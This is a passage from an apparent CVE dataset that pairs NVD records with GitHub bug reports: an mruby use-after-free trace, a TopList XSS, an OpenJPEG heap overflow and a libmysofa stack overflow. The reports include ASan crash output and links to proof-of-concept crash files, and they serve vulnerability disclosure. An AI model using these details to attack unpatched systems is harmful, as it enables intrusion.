0x4f6563 in mrb_malloc /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:245:10 #5 0x4f6608 in mrb_calloc /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:263:9 #6 0x57a507 in stack_init /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:131:28 #7 0x577be9 in mrb_funcall_with_block /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:461:7 #8 0x5774fc in mrb_funcall_with_block /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:439:13 #9 0x576ce5 in mrb_funcall_argv /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:539:10 #10 0x63e56b in mrb_obj_new /home/casper/targets/gramma/mruby/dbg/BUILD/src/class.c:1553:5 #11 0x5e4894 in mrb_exc_new_str /home/casper/targets/gramma/mruby/dbg/BUILD/src/error.c:31:10 #12 0x5f00df in mrb_init_exception /home/casper/targets/gramma/mruby/dbg/BUILD/src/error.c:574:20 #13 0x6c4c94 in mrb_init_core /home/casper/targets/gramma/mruby/dbg/BUILD/src/init.c:42:3 #14 0x5439cb in mrb_open_core /home/casper/targets/gramma/mruby/dbg/BUILD/src/state.c:43:3 #15 0x543a9c in mrb_open_allocf /home/casper/targets/gramma/mruby/dbg/BUILD/src/state.c:71:20 #16 0x543a6a in mrb_open /home/casper/targets/gramma/mruby/dbg/BUILD/src/state.c:63:20 #17 0x4f0cea in main /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:253:20 #18 0x7f3a58255b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-use-after-free /home/casper/fuzz/fuzzdeps/llvm-9.0.0.src/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22 in __asan_memcpy Shadow bytes around the buggy address: 0x0c3a7fff8100: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c3a7fff8150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd 0x0c3a7fff8160: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c3a7fff8170: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c3a7fff8180: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c3a7fff8190: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c3a7fff81a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==47556==ABORTING ```
heap use after free in hash_slice in mrbgems/mruby-hash-ext/src/hash-ext.c:61
https://api.github.com/repos/mruby/mruby/issues/4927/comments
3
2020-01-10T08:49:02Z
2020-01-27T21:53:27Z
https://github.com/mruby/mruby/issues/4927
547,944,492
4,927
1,006
CVE-2019-20377
2020-01-11T04:15:10.927
TopList before 2019-09-03 allows XSS via a title.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tophubs/TopList/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/tophubs/TopList/issues/32" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tophub:toplist:*:*:*:*:*:*:*:*", "matchCriteriaId": "7BD8724C-4223-4B99-9694-B2C98152AF61", "versionEndExcluding": "2019-09-03", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/tophubs/TopList/issues/32
[ "Third Party Advisory" ]
github.com
[ "tophubs", "TopList" ]
I watched a odd title when I visited your website
There is a Cross Site Scripting(XSS) Vulnerability
https://api.github.com/repos/tophubs/TopList/issues/32/comments
4
2019-09-03T08:37:33Z
2020-01-12T08:40:36Z
https://github.com/tophubs/TopList/issues/32
488,467,484
32
1,007
CVE-2020-6851
2020-01-13T06:15:10.957
OpenJPEG through 2.3.1 has a heap-based buffer overflow in opj_t1_clbl_decode_processor in openjp2/t1.c because of lack of opj_j2k_update_image_dimensions validation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0262" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0274" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0296" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1228" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00025.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00008.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LACIIDDCKZJEPKTTFILSOSBQL7L3FC6V/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XBRMI2D3XPVWKE3V52KRBW7BJVLS5LD3/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4882" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0262" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0274" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0296" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1228" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00025.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00008.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LACIIDDCKZJEPKTTFILSOSBQL7L3FC6V/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XBRMI2D3XPVWKE3V52KRBW7BJVLS5LD3/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4882" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uclouvain:openjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "0142BF7B-EBFC-4EAD-87C8-7D0FFF7E9486", "versionEndExcluding": null, "versionEndIncluding": "2.3.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "33C068A4-3780-4EAB-A937-6082DF847564", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_eus:7.7:*:*:*:*:*:*:*", "matchCriteriaId": "83737173-E12E-4641-BC49-0BD84A6B29D0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_eus:8.1:*:*:*:*:*:*:*", "matchCriteriaId": "92BC9265-6959-4D37-BE5E-8C45E98992F8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "831F0F47-3565-4763-B16F-C87B1FF2035E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_eus:8.4:*:*:*:*:*:*:*", "matchCriteriaId": "0E3F09B5-569F-4C58-9FCA-3C0953D107B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "51EF4996-72F4-4FA4-814F-F5991E7A8318", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*", "matchCriteriaId": "7431ABC1-9252-419E-8CC1-311B41360078", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "6897676D-53F9-45B3-B27F-7FF9A4C58D33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*", "matchCriteriaId": "E28F226A-CBC7-4A32-BE58-398FA5B42481", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*", "matchCriteriaId": "17F256A9-D3B9-4C72-B013-4EFD878BFEA8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "B09ACF2D-D83F-4A86-8185-9569605D8EE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*", "matchCriteriaId": "AC10D919-57FD-4725-B8D2-39ECB476902F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "825ECE2D-E232-46E0-A047-074B34DB1E97", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:georaster:18c:*:*:*:*:*:*:*", "matchCriteriaId": "C32EB474-941D-4E03-9109-917D90500F56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:outside_in_technology:8.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "72F1A960-EBA5-4BDB-B629-20F0D2384562", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:outside_in_technology:8.5.5:*:*:*:*:*:*:*", "matchCriteriaId": "3198F822-43F8-4CB3-97F7-C2982FDA5CBD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/uclouvain/openjpeg/issues/1228
[ "Exploit", "Third Party Advisory" ]
github.com
[ "uclouvain", "openjpeg" ]
Hi, I found a heap buffer overflow that affects at least version 2.3.1 and current master (ac3737372a00b8778b528094dd5bd58a74f67d42). On a regular build of openjpeg (in my case, the one shipped by Arch Linux), it leads to a crash; when building the project with address sanitizer, I get the following report: ``` $ bin/opj_decompress -i ../openjpeg_poc -o /tmp/image_verification.pgm =========================================== The extension of this file is incorrect. FOUND 1682. SHOULD BE .jp2 =========================================== [INFO] Start to read j2k main header (1277). [INFO] Main header has been correctly decoded. [INFO] No decoded area parameters, set the decoded area to the whole image [INFO] Header of tile 1 / 33 has been read. ================================================================= ==31465==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700000021c at pc 0x7fb82957229f bp 0x7ffe4b153d50 sp 0x7ffe4b153d48 WRITE of size 4 at 0x60700000021c thread T0 #0 0x7fb82957229e in opj_t1_clbl_decode_processor (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x9f29e) #1 0x7fb8294e9a6c in opj_thread_pool_submit_job (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x16a6c) #2 0x7fb829566891 in opj_t1_decode_cblks (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x93891) #3 0x7fb8295b8790 in opj_tcd_decode_tile (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0xe5790) #4 0x7fb82951e632 in opj_j2k_decode_tile (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x4b632) #5 0x7fb829538e1e in opj_j2k_decode_tiles (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x65e1e) #6 0x7fb829524105 in opj_j2k_decode (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x51105) #7 0x7fb82954385b in opj_jp2_decode (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x7085b) #8 0x50e5d7 in main (/home/seba/tested_software/openjpeg_master/build_asan/bin/opj_decompress+0x50e5d7) #9 0x7fb82914d09a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2409a) #10 0x42f6f9 in _start (/home/seba/tested_software/openjpeg_master/build_asan/bin/opj_decompress+0x42f6f9) 0x60700000021c is located 0 bytes to the right of 60-byte region [0x6070000001e0,0x60700000021c) allocated by thread T0 here: #0 0x4dbd79 in __interceptor_posix_memalign (/home/seba/tested_software/openjpeg_master/build_asan/bin/opj_decompress+0x4dbd79) #1 0x7fb8295c4f8f in opj_aligned_malloc (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0xf1f8f) #2 0x7fb8295b7b4a in opj_tcd_decode_tile (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0xe4b4a) #3 0x7fb82951e632 in opj_j2k_decode_tile (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x4b632) #4 0x7fb829538e1e in opj_j2k_decode_tiles (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x65e1e) #5 0x7fb829524105 in opj_j2k_decode (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x51105) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/seba/tested_software/openjpeg_master/build_asan/bin/libopenjp2.so.7+0x9f29e) in opj_t1_clbl_decode_processor Shadow bytes around the buggy address: 0x0c0e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c0e7fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa 0x0c0e7fff8010: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0e7fff8020: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 0x0c0e7fff8030: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 =>0x0c0e7fff8040: 00 00 00[04]fa fa fa fa fa fa 00 00 00 00 00 00 0x0c0e7fff8050: 00 04 fa fa fa fa fa fa 00 00 00 00 00 00 00 04 0x0c0e7fff8060: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fa 0x0c0e7fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa 0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==31465==ABORTING ``` For the report, I built with Clang 8.0.1 on Debian stable, using `CFLAGS=-fsanitize=address` and `CXXFLAGS=-fsanitize=address`, and calling CMake with `-DBUILD_THIRDPARTY=ON -DCMAKE_BUILD_TYPE=Release`. The crashing input is available [here](http://www.s3.eurecom.fr/~seba/openjpeg_poc). Since I believe this may be exploitable, I would like to request a CVE. Let me know if I can help with more information. Thank you!
Heap buffer overflow in libopenjp2
https://api.github.com/repos/uclouvain/openjpeg/issues/1228/comments
3
2020-01-10T13:00:24Z
2020-01-18T10:11:49Z
https://github.com/uclouvain/openjpeg/issues/1228
548,066,919
1,228
1,008
CVE-2020-6860
2020-01-13T07:15:10.557
libmysofa 0.9.1 has a stack-based buffer overflow in readDataVar in hdf/dataobject.c during the reading of a header message attribute.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hoene/libmysofa/issues/96" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PGQ45S4RH7MC42NHTAGOIHYR4C5IRTMZ/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WGY7TAZX2M4NYXXGNHIBBKKN5XMSMKQ4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hoene/libmysofa/issues/96" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PGQ45S4RH7MC42NHTAGOIHYR4C5IRTMZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WGY7TAZX2M4NYXXGNHIBBKKN5XMSMKQ4/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:symonics:libmysofa:0.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "CD74AEE2-5219-4872-94D2-F63C8459CAC4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/hoene/libmysofa/issues/96
[ "Exploit", "Third Party Advisory" ]
github.com
[ "hoene", "libmysofa" ]
We found Stack Buffer Overflow in mysofa2json binary and mysofa2json is complied with clang enabling ASAN. **Machine Setup** ``` Machine : Ubuntu 16.04.3 LTS gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.11) Commit : be7ac15 Command : mysofa2json POC ``` **POC** : [POC.zip](https://github.com/hoene/libmysofa/files/4044993/POC.zip) **ASAN Output** ``` fuzzme@fuzz:~/victim/libmysofa/src$ ./mysofa2json POC ================================================================= ==6267==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffffee4cd50 at pc 0x000000462551 bp 0x7ffffee4cc20 sp 0x7ffffee4c3d0 WRITE of size 20 at 0x7ffffee4cd50 thread T0 #0 0x462550 in __interceptor_vsprintf (/home/fuzzme/victim/libmysofa/src/mysofa2json+0x462550) #1 0x462682 in __interceptor_sprintf (/home/fuzzme/victim/libmysofa/src/mysofa2json+0x462682) #2 0x4f77d8 in readDataVar /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:555:4 #3 0x4f7d7a in readDataDim /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:589:17 #4 0x4f935b in readData /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:602:9 #5 0x4f935b in readOHDRHeaderMessageAttribute /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:706 #6 0x4f935b in readOHDRmessages /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:822 #7 0x4fa0d4 in readOCHK /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:865:8 #8 0x4fa0d4 in readOHDRHeaderMessageContinue /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:631 #9 0x4fa0d4 in readOHDRmessages /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:826 #10 0x4f8326 in dataobjectRead /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:913:8 #11 0x502dcf in directblockRead /home/fuzzme/victim/libmysofa/src/hdf/fractalhead.c:206:10 #12 0x500fac in fractalheapRead /home/fuzzme/victim/libmysofa/src/hdf/fractalhead.c:457:10 #13 0x4f850a in dataobjectRead /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:937:9 #14 0x4f6f4e in superblockRead /home/fuzzme/victim/libmysofa/src/hdf/superblock.c:83:9 #15 0x4ed5ad in mysofa_load /home/fuzzme/victim/libmysofa/src/hrtf/reader.c:249:9 #16 0x4eafa6 in main /home/fuzzme/victim/libmysofa/src/tests/sofa2json.c:24:9 #17 0x7efc6be5d82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #18 0x419838 in _start (/home/fuzzme/victim/libmysofa/src/mysofa2json+0x419838) Address 0x7ffffee4cd50 is located in stack of thread T0 at offset 48 in frame #0 0x4f717f in readDataVar /home/fuzzme/victim/libmysofa/src/hdf/dataobject.c:497 This frame has 2 object(s): [32, 48) 'number' [64, 72) 'dataobject' <== Memory access at offset 48 partially underflows this variable SUMMARY: AddressSanitizer: stack-buffer-overflow 